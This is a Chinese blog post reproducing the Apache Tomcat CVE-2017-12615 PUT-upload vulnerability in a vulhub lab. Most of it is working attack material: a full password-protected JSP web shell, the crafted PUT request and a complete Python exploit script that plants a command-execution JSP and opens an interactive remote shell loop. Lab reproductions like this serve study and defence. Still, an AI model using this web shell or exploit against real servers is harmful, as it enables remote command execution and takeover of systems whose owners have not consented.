tomcat-CVE-2017-12615复现
1环境【github中的vulhub】https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-126152打开网址 http://your ip:8080用脚本扫描发现有CVE-2017-12615漏洞3使用burpsuite抓包然后构造包上传【PUT /1.jsp/ HTTP/1.1】shell代码<%@ page lang
·
1
环境【github中的vulhub】
https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
2
打开网址 http://your ip:8080
用脚本扫描发现有CVE-2017-12615漏洞
3
使用burpsuite抓包
然后构造包上传【PUT /1.jsp/ HTTP/1.1 】
shell代码
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
4
访问
http://192.168.1.132:8080/2.jsp?&pwd=023&cmd=whoami
5
使用脚本
cve-2017-12615_cmd.py
python2 cve-2017-12615_cmd.py http://192.168.1.132:8080
#!/usr/bin/env python
# coding:utf-8
import requests
import sys
import time
if len(sys.argv)!=2:
print('+----------------------------------------------------------+')
print('+ USE: python <filename> <url> +')
print('+ EXP: python cve-2017-12615_cmd.py http://1.1.1.1:8080 id +')
print('+ VER: Apache Tomcat 7.0.0 - 7.0.81 +')
print('+----------------------------------------------------------+')
print('+ DES: 临时创建 Webshell exphub.jsp +')
print('+----------------------------------------------------------+')
sys.exit()
url = sys.argv[1]
payload_url = url + "/exphub.jsp/"
payload_header = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}
def payload_command (command_in):
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
payload_1 = command_filtered
return payload_1
def creat_command_interface():
payload_init = "<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();" \
"int a = -1;" \
"byte[] b = new byte[2048];" \
"while((a=in.read(b))!=-1){out.println(new String(b));}" \
"%>"
result = requests.put(payload_url, headers=payload_header, data=payload_init)
time.sleep(5)
payload = {"cmd":"whoami"}
verify_response = requests.get(payload_url[:-1], headers=payload_header, params=payload)
if verify_response.status_code == 200:
return 1
else:
return 0
def do_post(command_in):
payload = {"cmd":command_in}
result = requests.get(payload_url[:-1], params=payload)
print result.content
if (creat_command_interface() == 1):
print "[+] Put Upload Success: "+payload_url[:-1]+"?cmd=id\n"
else:
print("[-] This host is not vulnerable CVE-2017-12615")
exit()
while 1:
command_in = raw_input("Shell >>> ")
if command_in == "exit" : exit(0)
do_post(command_in)
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
0
0- 0
已为社区贡献1条内容
所有评论(0)